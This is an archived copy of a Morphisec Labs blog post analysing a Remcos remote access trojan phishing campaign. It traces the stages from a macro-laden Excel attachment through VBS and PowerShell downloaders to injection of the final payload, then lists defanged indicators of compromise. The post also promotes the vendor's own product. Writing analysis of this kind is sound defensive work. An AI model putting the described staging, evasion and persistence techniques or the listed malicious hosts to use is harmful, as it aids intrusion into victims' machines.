{
	"id": "ec20f63d-c2f7-4f13-9b72-f1ce0b9c3385",
	"created_at": "2026-04-06T00:20:16.64678Z",
	"updated_at": "2026-04-10T03:20:50.417633Z",
	"deleted_at": null,
	"sha1_hash": "db73251882f0c02542f5b6fa33851547721a8e9e",
	"title": "New Wave of Remcos RAT Phishing Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1323869,
	"plain_text": "New Wave of Remcos RAT Phishing Campaign\r\nBy Hido Cohen\r\nArchived: 2026-04-05 16:21:25 UTC\r\nMorphisec Labs has detected a new wave of Remcos trojan infection. The theme of the phishing emails is again\r\nfinancial, this time as payment remittances sent from financial institutions. The attacker lures a user to open a\r\nmalicious Excel file that contains “confidential information” which starts the infection chain.\r\nMorphisec’s analysis has identified several services used for these phishing campaigns. They include Wells Fargo,\r\nFIS Global, and ACH Payment notifications. For example:\r\nFigure 1: Email from Wells Fargo’s CEO with a malicious attachment\r\nThis infection contains many stages and largely depends on the C2 server, which stores the required files for each\r\nstage.\r\nhttps://blog.morphisec.com/remcos-trojan-analyzing-attack-chain\r\nPage 1 of 12\n\nFigure 2: All stages stored in the C2.\r\nThe attacker also uses a password-protected .xls file to lower the detection rate. The password is in the phishing\r\nemail, and as we can see—password protection helps:\r\nFigure 3: The malicious attachment and first stage detection rate\r\nIn this blog post, we analyze the full attack chain used by the attacker and explain how each step works.\r\nWhat is the Remcos Trojan?\r\nRemcos is a commercial remote access trojan (RAT) developed by BreakingSecurity. Remcos has many\r\ncapabilities, and a free version downloadable directly from BreakingSecurity’s website. Morphisec has previously\r\ncovered Remcos as the payload in Guloader, and the payload in the Babadeda crypter.\r\nThe Remcos trojan allows attackers to quickly and easily control an infected computer, steal personal information,\r\nand surveil a victim’s activity. All this without investing time in developing a tool with remote administration\r\ncapabilities.\r\nhttps://blog.morphisec.com/remcos-trojan-analyzing-attack-chain\r\nPage 2 of 12\n\nThe Infection Chain\r\nFigure 4: Infection chain steps\r\nThe .xls file writes and executes a new .vbs file. The code inside the file executes a PowerShell command that\r\ndownloads another .vbs file from a remote server. Once downloaded and saved on the disk, PowerShell executes\r\nthe file. Next, the newly downloaded .vbs file connects to the C2 server again and fetches an encoded PowerShell\r\ncommand. This PowerShell code is responsible for downloading the next stage and decoding it. This stage\r\ncontains a .NET injector and the final payload. After decoding, the PowerShell initiates the injector that introduces\r\nthe final payload, known as Remcos RAT.\r\nTechnical Analysis\r\nAnalyzed Sample\r\n.xls:  8740cdcef9e825fd5105b021e0616a1d6a41f761c92f29127cd000c8500f70e6\r\nFirst Stage: .xls\r\nSteps 2-3 in Figure 4\r\nhttps://blog.morphisec.com/remcos-trojan-analyzing-attack-chain\r\nPage 3 of 12\n\nFigure 5: The malicious .xls file\r\nThe .xls file contains a Visual Basic code that executes once a user opens the file and enables macros. Looking\r\ninside the file reveals the logic behind the script.\r\nFigure 6: Main VB function\r\nFirst, the .vbs reads the PowerShell command that is written to F variable, a FileSystemObject CLSID to F2, and a\r\nsecond CLSID (Shell.Application) to F3. Next it creates a new file inside %AppData% using the CLSID object\r\nlocated inside F2. Finally, it writes F to that file and calls the function that executes it. It does so by creating a\r\nShell.Application object using the second CLSID loaded and runs the newly created QAITB.vbs file.\r\nhttps://blog.morphisec.com/remcos-trojan-analyzing-attack-chain\r\nPage 4 of 12\n\nSecond Stage: .vbs Executes PowerShell Downloader\r\nSteps 3-5 in Figure 4\r\nInside QAITB.vbs is a reversed PowerShell command which downloads the next stage and saves it to disk.\r\nFigure 7: .vbs downloader\r\nThe malware uses Shell.Application CLSID again to execute the PowerShell command. The PowerShell\r\ncommand downloads the file from 209.127.19[.]101/win.vbs in this case, and saves it inside %Temp%harvest.vbs\r\nwhich also deletes the previous file at %APPDATA%QAITB.vbs. (See the IOCs section for more.)\r\nThird Stage: Another.vbs Downloader\r\nSteps 6-7 in Figure 4\r\nThe malware continues to communicate with its C2 server, requesting more files. This time the file request is\r\nmade by harvest.vbs. This .vbs file is responsible for two things:\r\n1. Setting persistence by copying the script file to the Startup folder.\r\nFigure 8: Set persistence by copying the script to the Startup folder\r\n2. Downloading the next stage from the C2 server.\r\nhttps://blog.morphisec.com/remcos-trojan-analyzing-attack-chain\r\nPage 5 of 12\n\nFigure 9: Download and execute the next stage\r\nThe malware uses InternetExplorer class to create a hidden new IE window that navigates to a URL. It then\r\nextracts the command located in InnerText.\r\nThe next stage is executed using the same Shell.Application CLSID as before:\r\nFigure 10: Powershell execution from .vbs\r\nWhich translates to:\r\nGetObject(“new:13709620-C279-11CE-A49E-444553540000”).ShellExecute powershell \u003ccommand\u003e\r\nFourth Stage: Encoded Powershell\r\nSteps 8-9 in Figure 4\r\nThe downloaded PowerShell command is another encoded command that translates to:\r\nhttps://blog.morphisec.com/remcos-trojan-analyzing-attack-chain\r\nPage 6 of 12\n\nFigure 11: Decoded PowerShell command\r\nWhere g is an alias for IEX.\r\nThis command checks if the machine has an internet connection by pinging google.com. If so, it communicates\r\nwith the C2 server again. The next stage is another PowerShell command executed using IEX.\r\nFifth Stage: Powershell Unzips Injector and FInal Payload\r\nSteps 10-11 in Figure 4\r\nThis stage uses two large GZipped archives and extracts them. The first blob is a .NET injector. The second is the\r\nfinal payload injected into the target process.\r\nThe important commands in this stage are:\r\nFigure 12: Final payload injector execution\r\nThe malware loads the extracted data located inside $JtpgNId. This is the injector. Once the injector is loaded into\r\nmemory, the malware calls a toooyou.Black function that injects the payload into RegAsm.exe.\r\nFInal Payload\r\nAt this point we get the final payload, a Remcos RAT.\r\nFigure 13: Remcos RAT agent initialized message\r\nhttps://blog.morphisec.com/remcos-trojan-analyzing-attack-chain\r\nPage 7 of 12\n\nIn this case the configuration of the Remcos trojan is stored as a resource named SETTINGS. It is RC4 encrypted.\r\nWe can extract the configuration by decrypting it using the following steps:\r\n1. Read the first byte in the resource—this is the key length.\r\n2. Read the next \u003ckey_length\u003e bytes—this is the key.\r\n3. Read the rest of the data—this is the encrypted section.\r\n4. RC4 decrypt the encrypted section using the key.\r\nAfter extracting the configuration, we can find where the stolen data was sent to:\r\nFigure 14: Remcos decrypted configuration\r\nThis sample communicates with freshdirect.dvrlists[.]com:119.\r\nHow Do You Stop a Remcos Trojan?\r\nA Remcos RAT is just the final component of a lengthy and sophisticated attack chain delivery process. Such\r\nattacks use advanced defense evasion techniques to sneak past cybersecurity solutions. These techniques include\r\ndisabling or uninstalling security tools, and obfuscating or encrypting data and scripts. According to the latest\r\nPicus report, defense evasion is now the most popular tactic among malware operators.\r\nMorphisec’s patented Moving Target Defense is the best on the market for preventing defense evasion techniques.\r\nUnlike other cybersecurity solutions which focus on detecting known patterns with response playbooks,\r\nMorphisec MTD preemptively blocks attacks on memory and applications and remediates the need for response.\r\nTo find out more about Morphisec’s revolutionary Moving Target Defense technology, read the white paper: Zero\r\nTrust + Moving Target Defense: Stopping Ransomware, Zero-Day, and Other Advanced Threats Where NGAV and\r\nEDR Are Failing.\r\nhttps://blog.morphisec.com/remcos-trojan-analyzing-attack-chain\r\nPage 8 of 12\n\nIndicators of Compromise (IOCs)\r\n                 Emails\r\nc221b6eb8437d1f43ebffae9e51c7d330016290d048cfff2f402a7508b1e16e3\r\n8740cdcef9e825fd5105b021e0616a1d6a41f761c92f29127cd000c8500f70e6\r\n6d9d1de4f4ea0e4aeb553458f4cea2af1a2554fe84c952b367ed5eb753990fc7\r\n342bad5211bf3c8af50e263334bb90b580d71220e6b16597ba7bdd6f404e4215\r\nb5833f95871ced64f48649b55e075e85c1c595f4af8522082c8e3ef72917ae80\r\na2cffc70c2b63baa3ada0b916b778996204bd3b7a91eab66757b4343888eec3f\r\n1a5b5299afb0c657e2141aaf46600c6ca91ca80840d65fb3b5afb53a99069e53\r\n                 XLSs\r\n6ad5d2aae0cb58f943f39d8b43492fd6007cd8caeeaaea03013194572756b124\r\n85c4808b3ed64480ae0d9f5c6fdaade6c7298f89cb4b799f0d5510b674d0a367\r\ndc88c4ddc7f428a266cf619d4d5367fa10a86c2c7fc18a359eb8d9d264437111\r\n26bd031cb4a5333bbd77698f5aaf737cb108b4b9d30670d92218a8c31ec0abc7\r\n5115b590c285b437f5d432b1ca0ad8ee8ba89afedd7a5228d8d79e20e6ec84d8\r\n77268e599a7bee74da06206f33c4725e262627d88123c7920e6aab9d9473a1c0\r\nXLSs .vbs\r\ne0306366dd9c04bc92421d855a116d145e4b9afe4852bc77a02089d363d031a4\r\n1e7dba5f19588eeceffb45e96f4673ce181d64392805c5a78e83ae8c15d42d61\r\na954043909b90d12ab1659e2d28adb236b4ac521084282448757f7b1fd8d8b05\r\nhttps://blog.morphisec.com/remcos-trojan-analyzing-attack-chain\r\nPage 9 of 12\n\n6f2e30793f43ea5b71f5609fa508acf595393d1a3e2ac2a9e8205228e0c50fe8\r\n128971c9ae22f36db1074ff2e93c2adb07c21eb3e5c139d501e06ef29bf28b97\r\n3f54c5f1cf53bb9a87aabdd0847c3506aebda16e5c384ab2d939264541e214e9\r\n70a1064fee27885c8d3caa5c18e0c08609c50ecdaa8e0ee2b9ce5c97a6df21f1\r\ne646ad0c447c477004947aa49154c9d1cf1013769332f76aa46bc230ae286d1c\r\nc04840608386221e34ec81c5e9875e6e77cbdbf3acd63e76e338a1ad5ccf8da5\r\n1cb0c04eefe74736dc16b418e01fa7d61753992bc4898fe3600f61d648e64e1c\r\nda546ce81e022979c8dc7942667e57aa605b11cae9eb20d917df63cad75d4ec3\r\nf3ef4e8e91f7558a6e86f4001e0fc78defeaafe0298263a8f3bd62a451e45c5e\r\nURLs\r\nhxxp://kingspalmhomes[.]com/wprl/Protected Client.vbs\r\nhxxp://kingspalmhomes[.]com/admin/Protected Client.vbs\r\nhxxp://kingspalmhomes[.]com/wprl/Protected.vbs\r\nhxxp://kingspalmhomes[.]com/admin/Protected Client.vbs\r\nhxxp://kingspalmhomes[.]com/product/Protected.vbs\r\nhxxp://fisintegrateds[.]com/zp-admin/Protected Client.vbs\r\nhxxp://fisintegrateds[.]com/zp-admin/Protected Client.vbs\r\nhxxp://gotovacoil[.]com/created/Protected Client.vbs\r\nhxxp://gotovacoil[.]com/newfolder/Protected Client.vbs\r\nhxxp://dreamwatchevent[.]com/wsalptza/Client.vbs\r\nhxxp://dreamwatchevent[.]com/zp-user/Protected Client.vbs\r\nhxxp://209.127.19[.]101/win.vbs\r\nhxxp://209.127.19[.]101/pit.txt\r\nhxxp://209.127.19[.]101/kif.jpg\r\nDomains\r\nfisintegrateds[.]com\r\nhttps://blog.morphisec.com/remcos-trojan-analyzing-attack-chain\r\nPage 10 of 12\n\nkingspalmhomes[.]com\r\ngotovacoil[.]com\r\ndreamwatchevent[.]com\r\n209.127.19[.]101\r\nFinal Payload (Remcos)\r\n79AD11D52EA3D0BD956CAD871396C8DA2C9A76FFFC02E694339B7FE8B6CE18EA\r\n401D142905E2253E7E38CC7E275A09A4A0F45AE73F15748EA69C1F6CB0591A81\r\nCFD29C1AC568E0A21B5F2C05B96BB5BBF2848E89BD6DBDDF4C69DAB3B1CD8A32\r\n79AD11D52EA3D0BD956CAD871396C8DA2C9A76FFFC02E694339B7FE8B6CE18EA\r\nCFD29C1AC568E0A21B5F2C05B96BB5BBF2848E89BD6DBDDF4C69DAB3B1CD8A32\r\nRemcos C2s\r\nshiestynerd[.]dvrlists[.]com\r\nbreakingsecurity[.]dvrlists[.]com\r\nfreshdirect[.]dvrlists[.]com\r\nAbout the author\r\nHido Cohen\r\nhttps://blog.morphisec.com/remcos-trojan-analyzing-attack-chain\r\nPage 11 of 12\n\nSource: https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain\r\nhttps://blog.morphisec.com/remcos-trojan-analyzing-attack-chain\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain"
	],
	"report_names": [
		"remcos-trojan-analyzing-attack-chain"
	],
	"threat_actors": [],
	"ts_created_at": 1775434816,
	"ts_updated_at": 1775791250,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/db73251882f0c02542f5b6fa33851547721a8e9e.pdf",
		"text": "https://archive.orkl.eu/db73251882f0c02542f5b6fa33851547721a8e9e.txt",
		"img": "https://archive.orkl.eu/db73251882f0c02542f5b6fa33851547721a8e9e.jpg"
	}
}